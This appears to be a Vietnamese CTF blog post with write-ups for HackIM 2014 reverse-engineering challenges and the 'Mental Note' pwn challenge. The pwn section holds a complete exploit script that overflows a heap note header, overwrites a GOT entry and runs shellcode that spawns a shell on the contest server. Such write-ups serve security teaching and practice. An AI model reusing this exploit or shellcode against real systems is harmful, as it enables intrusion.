Tag Archives: re

[HackIM 2014] RE + Pwn MentalNote

RE 100 - boo

binary khá nặng

C:\Users\chim\Desktop\nullcon\re\boo>trid boo

TrID/32 - File Identifier v2.10 - (C) 2003-11 By M.Pontello

Collecting data from file: boo
100.0% (.) Mac OS X Mach-O 64bit Intel executable (4000/1)

=> Mac OS Binary kernel Mach 64 bit

Check string 1 tí thì thấy UPX 3.91!. Ok thử decompress nào

C:\Users\chim\Desktop\nullcon\re\boo>upx -d boo
            Ultimate Packer for eXecutables
             Copyright (C) 1996 - 2013
UPX 3.91w    Markus Oberhumer, Laszlo Molnar & John Reiser  Sep 30th 2013

    File size     Ratio   Format   Name
  --------------------  ------  -----------  -----------
upx: boo: NotPackedException: not packed by UPX

Unpacked 0 files.

Failed!

Check lại string lần nữa để ý thấy cái zlib.so, struct.so, python ME... nghi ngờ thể loại python->bin quá.

Find header PYZ => founded :yolo:

boo_3

Ok easy roài, extract data python ra thôi - Link

import sys

if len(sys.argv) == 13:
	print "Great: flag{g3771ng_st4rt3d_2015}"
else:
	print "."

-------------------------------------------------------------------------------------------------------

RE 200 - upx.exe

string thử chả thấy cái UPX! signature nào @@. decompress lại cho chắc failed nốt.

upx_1

Run

upx_2

OK boy let's make it nicely!

Bật IDA Disass thấy đây là 1 binary MS C++ bình thường.

main là winMain -> sau đó call hàm sub_4001000

int __stdcall wWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int nShowCmd)
{
  sub_401000();
  return 0;
}

void *__cdecl sub_401000()
{
  void *result; // eax@1
  void *MZ_header; // ecx@1
  int v2; // ecx@4
  int v3; // ebp@4
  int v4; // esi@4
  int v5; // ebx@4
  const char *v6; // edi@5
  unsigned int v7; // edi@9
  int v8; // ebx@9
  HANDLE v9; // eax@9
  void *v10; // esi@9
  unsigned int v11; // eax@10
  HANDLE v12; // eax@12
  int v13; // ebx@12
  SIZE_T v14; // [sp+0h] [bp-28h]@1
  int v15; // [sp+4h] [bp-24h]@14
  int v16; // [sp+8h] [bp-20h]@14
  int v17; // [sp+Ch] [bp-1Ch]@14
  int v18; // [sp+10h] [bp-18h]@14
  int v19; // [sp+14h] [bp-14h]@14
  SIZE_T v20; // [sp+18h] [bp-10h]@14
  int v21; // [sp+1Ch] [bp-Ch]@14
  int v22; // [sp+20h] [bp-8h]@14
  int v23; // [sp+24h] [bp-4h]@14

  result = GetModuleHandleW(0);
  MZ_header = result;
  v14 = (SIZE_T)result;
  if ( result )
  {
    result = (void *)'ZM';
    if ( *(_WORD *)MZ_header == 'ZM' )
    {
      result = (char *)MZ_header + *((_DWORD *)MZ_header + 15);
      if ( *(_DWORD *)result == 'EP' )
      {
        v2 = *((_WORD *)result + 10);
        v3 = *((_WORD *)result + 3);
        v4 = 0;
        v5 = (int)((char *)result + v2 + 24);
        if ( v3 > 0 )
        {
          v6 = (char *)result + v2 + 24;
          while ( 1 )
          {
            result = (void *)strcmp(v6, ".reloc");
            if ( !result )
              break;
            ++v4;
            v6 += 40;
            if ( v4 >= v3 )
              return result;
          }
          v7 = *(_DWORD *)(v5 + 40 * v4 + 16);
          v8 = v5 + 40 * v4;
          v9 = GetProcessHeap();
          result = HeapAlloc(v9, 8u, v7 + 1);
          v10 = result;
          if ( result )
          {                      // malloc, copy hex sang cho malloc 6600
            unknown_libname_41(result, v14 + *(_DWORD *)(v8 + 12), *(_DWORD *)(v8 + 16));
            v11 = 0;
            if ( v7 )
            {
              do
                *((_BYTE *)v10 + v11++) ^= 0x11u;
              while ( v11 < v7 );
            }
            v14 = *(_DWORD *)v10;
            v12 = GetProcessHeap();
            result = HeapAlloc(v12, 8u, v14);
            v13 = (int)result;
            if ( result )
            {
              result = (void *)sub_406660((int)((char *)v10 + 4), (int)result, v7 - 4, (int)&v14);
              if ( !result )
              {
                v18 = 0;
                v15 = 0;
                v16 = 0;
                v17 = 0;
                v21 = 0;
                v22 = 0;
                v23 = 0;
                v20 = v14;
                v19 = v13;
                LOBYTE(v18) = 1;
                sub_401B60((int)&v15);
                ExitProcess(1u);
              }
            }
          }
        }
      }
    }
  }
  return result;
}

đầu tiên nó gọi hàm getModuleHandle để tìm base address của MZ Header
sau đó check MZ signature và PE signature ::for sure::

upx_3

find session .alloc

upx_4upx_6

var A = heapalloc(0x6600)

đến đoạn unknown_libname_41 này vì mình rất ghét cái gì cứ dấu giếm, và 1 phần nhác trỗi dậy. function thông thường của mscrt thôi nên xem các tham số truyền vô và kết quả trả về để đoán vậy (memcpy)

memcpy(0x41b00, A, 0x6600)
for i in range(0x6600):
	A[i] ^= 0x11

*một đoạn memory khá dài, lại còn bị mã hóa nữa. không thể nào là flag cipher được? Có lẽ nào là shellcode?

new_size = *(dword*)A = 0xbe00
var B = heapalloc(new_size)
sub_406660( &new_size ) => copy MZ_Header -> đến B, size = 0xbe00

upx_5

Từ đây ta nhảy vào sub func cuối là sub_401b60

Check các sub phụ, để ý các string mình thấy rất là liên quan

[+] Mapping PE file
[+] Creating Map View of File
[+] Map View of File created
[+] Checking for self relocation
[+] MyBase, MySize ?!?
[+] Jumping to relocated image
[+] Processing IAT
[+] Loading Library and processing
[+] Fixing Image Base address in PEB
[+] Executing Entry Point !!!

và 1 số function khá vãi

- CreateFileMappingW
- MapViewOfFile
- VirtualAlloc
- GetProcAddress
- VirtualQuery
- LoadLibraryA
- VirtualProtect

oke, tít đi ít! run shellcode chắc roài ::bem::

ta đặt breakpoint ở ngay các sub con và run lần lượt đến khi nào shell được chạy thì phát hiện điểm G

upx_7

sub_401b60 -> sub_401600 -> call eax
new entry point = 08001563

sài HxD (hex editor) view ram process upx.exe tại địa chỉ đó thì thấy nguyên session từ 0x08000000 -> 0x0800FFFF là 1 file PE mới,

search string thì thấy có dòng "You didn't ask nicely" và đặc biệt là "-pl34se-give-me-th3-k3y" :-ss

tới đây các bạn có thể extract ra 1 file exe mới và disass nghiên cứu (ko chắc là sẽ chạy đc ok), còn mình thì thấy nó có dạng 1 file ms c++ nữa nên so sánh structure với cái PE gốc để tìm addr winMain

địa chỉ 0x08001100

quá trình dịch cũng tương tự, bài mới này cũng không quá khó.

st = command_line_string
st[len(st)-1] = \x00

if st[len(st)]==\x20:
	if !strcmp(st, "-pl34se-give-me-th3-k3y"):
		func_flag()
		exit()
msgbox("You not nicely");

patch luôn cho lẹ, patch luôn chỗ strcmp và trong func_flag (0x08001000) có 1 chỗ gọi isDebuggerPresent (0x08001024)

upx_8

upx_9

Done.

----------------------------------------------------------------------------------

RE 400 - fin64

ubt64@ubt64-vb:/media/sf_Desktop/nullcon/re/fin64$ file fin64
fin64: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, BuildID[sha1]=0x9b62a9678a30ce6c576131024148154a0bc5575d, stripped

khi chạy và thử nhiều cách input, đều có kết quả "Not yet.."

ubt64@ubt64-vb:/media/sf_Desktop/nullcon/re/fin64$ ./fin64
Not yet..

main khá ngắn, ta dịch lần lượt
để ý, có 2 cái good_boy và bad_boy trong hình

fin64_1

đầu tiên là func_systime
gọi syscall 0xc9 để lấy timestamp sao đó lưu giá trị vào [rbp-18h]

fin64_2

func_ctime - convert timestamp thành giá trị giây:phút:giờ:ngày:tháng:năm => lưu vào [rbp-10h]

fin64_3

dừng ở đây, jump ngược từ good_boy và bad_boy ta thấy có đoạn sử dụng [rbp-10h]

fin64_4

nếu [rbp-10h] ở không bị thay đổi thì đoạn code pseudo ntn:

[rbp-24h] = [dw_time+16]+1 = tháng
[rbp-20h] = [dw_time+12] = ngày
[rbp-1ch] = [dw_time+20] + 1900 = năm
if ( [rbp-24h] == 9 && [rbp-20h] == 10 && [rbp-1ch] == 2011 )
	good_boy
else
	bad_boy

thử đặt lại time là 10/9/2011 và run => still failed :wth:

giờ ta jump back từ đoạn compare trên đến ngay sau chỗ convert, patch những đoạn jump để bypass khoảng ở giữa và chạy lại 1 lần nữa

$ ./fin64
Oops..

Good bj, mình đoán flag nằm trong memory, thử trace dần vào good_boy

thì phát hiện ra cái này *byte_6c2070

fin64_5

next-challenge

--------------------------------------------------------------------------------------

RE 500 - cso

bài này thực sự không biết nên viết writeup như thế nào vì công nhận là nó khá bựa và cách làm cũng ngẫu hứng vãi nhái :3

sau hồi dịch mình chả biết nó là cái giống gì, có vẻ giống virtual machine nhưng cũng ko giống lắm =)), đại khái nó như này:

main:
	print(Bla bla bla)
	gets(st) #main input
	len_st = strlen(st)
	super = 0x24ae5af1 #first magic hex
	while True:
		A: 
			if super-a1>0: jump b1
		B: 
			if super-a2>0: jump b2
		C: 
			if super-a3>0: jump b3
		...
		V: 
			if super-an>0: jump bn
		X:
			super = a(n+1)
		Y:
			super = a(n+2)
		...
		Z:
			super = am
		quit:
			break
		dead: 
			puts("You are dead man")
			super = super_to_quit
			continue
		win: 
			puts("You are safe and live forever")
			super = super_to_quit
			continue
		check_len: 
			if len_st==0x1A: 
				super = super_to_stage2
			else:
				super = super_to_dead
			continue
		stage_2:
			#func_stage2 ở địa chỉ 0x00400ec0
			if func_stage2(st)==1: 
				super = super_to_win
			else:
				super=super_to_dead
			continue

#mấy số a1, a2, ...an, a(n+1), ... , am là magic const, ko biết có quy luật gì những mà nó đc build để tính toán hợp lí
#các jump b1, b2, b3, ... bn là nhãn của một trong mấy thằng A,B,C,...V, quit, dead, win, check_len, stage_2

			
def stage2(st):
	#cấu trúc đệ quy
	#vòng lặp tương tự main
	#có thêm 1 số sub function phụ

Không biết flag ở chỗ nào luôn, code follow control dựa vào mấy phép cộng của a(i), giờ tìm quy luật cho nó cũng đuối đơ. Có duy nhất 1 cái chắc chắn là len_st = 0x1A = 26 (!!!)

Sau nửa tiếng suy nghĩ, mình thấy khi input với len = 26 và len < 26 thì cảm giác debug lâu hơn. Suy nghĩ: Side channel dựa vào instruction count được không?

$ python -c "print 'a'*26" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123368

$ python -c "print 'a'*25" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123097

$ python -c "print 'a'*24" | ./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ~/Desktop/cso | cat inscount.out 
Count 123097

Bingo, chuẩn girl mất rồi, side channel bem lần lượt các char

import subprocess
import time

sam = "abcdefghijklmnopqrstuvwxyz"
sam += sam.upper()
sam += "0123456789_!,.{}"

#217826 SRRDRSSRSRRDDSSSRSSDSDDDSS

def insco(fl):
	fl += 'a'*(26-len(fl))
	open('hellyeah','wt').write(fl)
	subprocess.call("./pin -t source/tools/ManualExamples/obj-intel64/inscount0.so -- ../cso < hellyeah", shell=True)
	time.sleep(0.2)
	k = open("inscount.out").read().strip().split(' ')[1]
	print "-----", fl, k
	return int(k)

def dequy(fl):
	if len(fl)==26:
		print fl
		raw_input("<< Another result, enter for the next...")
	else:
		a = insco(fl + 'a')
		#Cho nay sample chi co 1 ki tu trong string "SRD" thoi (manual check), co the set sam = "SRD" side channel nhanh hon
		for c in sam:
			cou = insco(fl + c)
			if cou-a>400: dequy(fl + c)


dequy('')

=> Final SRRDRSSRSRRDDSSSRSSDSDDDSS. Không giống flag cho lắm :-ss

Input test lại vẫn "You are dead man". Wut dafuq, đúng quá rồi còn gì.
Check lại cái inscount thì thấy có sự chênh lệch rất lớn ins.
Có thể là những mini-sub trong stage2 (0x00400ec0)
Kiểm tra lần lượt từng mini-sub đó ta thấy có sub_400BD0 sử dụng biến global(s) chính là string input ban đầu?!?

cso_1

Đặt breakpoint ngay tại đó và input đúng như trên, sau 1 số lần trace thì ...

cso_2
Âu Mai Gót, call cái địa chỉ vừa trả về, không phải run shell thì là run cái gì nữa =))

Chuyển hướng sang disass con shell, tương tự 3 bài rồi

cso_3

move rất nhiều ASCII Char vào memory, ghép lại thì thấy đó là 1 chuỗi base32 😛

Hard time gone 😛

s = "MZWGCZ33NV4V6YZQNVYDINJVL4YTKX3VNYYXC5JTPU"
sam = "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567"

def tobin(t):
  st = bin(t).replace('0b','')
  st = '0'*(5-len(st)) + st
  return st

k = ''
for i in s:
  t = sam.find(i)
  print i, sam.find(i), tobin(t)
  k += tobin(t)

k = k[0:208]
print hex(int(k,2))[2:].replace('L','').decode('hex')

flag{my_c0mp455_15_un1qu3}

--------------------------------------------------------------------------------------

PWN 400 - Mental Note

bài này về cơ bản khá giống mixme

cấu trúc dữ liệu:

struct note{
	int size;
	note* next_note;
	note* prev_note;
	content[linh động]
}

và array_note[999] lưu địa chỉ con trỏ của mỗi note được thêm

có 3 loại note:

loại 0 : content 100 bytes
loại 1 : content 200 bytes
loại 2 : content 400 bytes

* add-note, người dùng nhập 1 loại note sau đó chương trình malloc 1 lượng bộ nhớ vừa đủ phần header+content size => new_note

new_note được insert vào array_note sau khi đã check-note (dựa vào note header) để tìm id phù hợp.

* edit-note, người dùng nhập id, loại note và read(note-id-content, size=note-type) mà ko check xem note ở id ấy có đúng loại không.
=> nếu note add vào là loại 0 mà khi edit với loại 1/2 thì sẽ overwrite được sang header note khác.

bằng cách này ta sẽ chỉnh phần header của note kế tiếp để khai thác lỗi check-note của add-note function.

Payload:

import socket, time

def send(s, m):
  print "[SEND]", m
  s.send(m)

def recv(s):
  t = s.recv(4096)
  print "[RECV]", t
  return t

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect (( "54.163.248.69",9004 ))

recv(s)
recv(s)

#Add 3 notes, Type 0
for i in range(3):
	send(s, "1\n")
	recv(s)
	send(s, "0\n")
	recv(s)

#Edit note id=2, Type=0, shellcode
send(s, "3\n")
recv(s)
send(s, "2\n")
recv(s)
send(s, "0\n")
recv(s)
#shell
shell = "\x6a\x0f\x58\x83\xe8\x04\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"
send(s, "\x90"*20 + shell)
recv(s)

#Edit note id=0, Type=1, overwrite header and change g0t.plt
send(s, "3\n")
recv(s)
send(s, "0\n")
recv(s)
send(s, "1\n")
recv(s)
#magic bytes
send(s, (0x80-12)*'a' + "\x04\xc1\xeb\x0f\x1c\xb0\x04\x08")
recv(s)

#jump to shellcode by function was changed in g0t.plt
send(s, "1\n")
recv(s)
send(s, "0\n")
recv(s)

send(s,"cat flag.txt\n")
recv(s)

#flag{y0u_br0k3_1n70_5h3rl0ck_m1ndp4l4c3}

s.close()

flag{y0u_br0k3_1n70_5h3rl0ck_m1ndp4l4c3} !!!

So long and deep, go get some sleep :'( . Chim!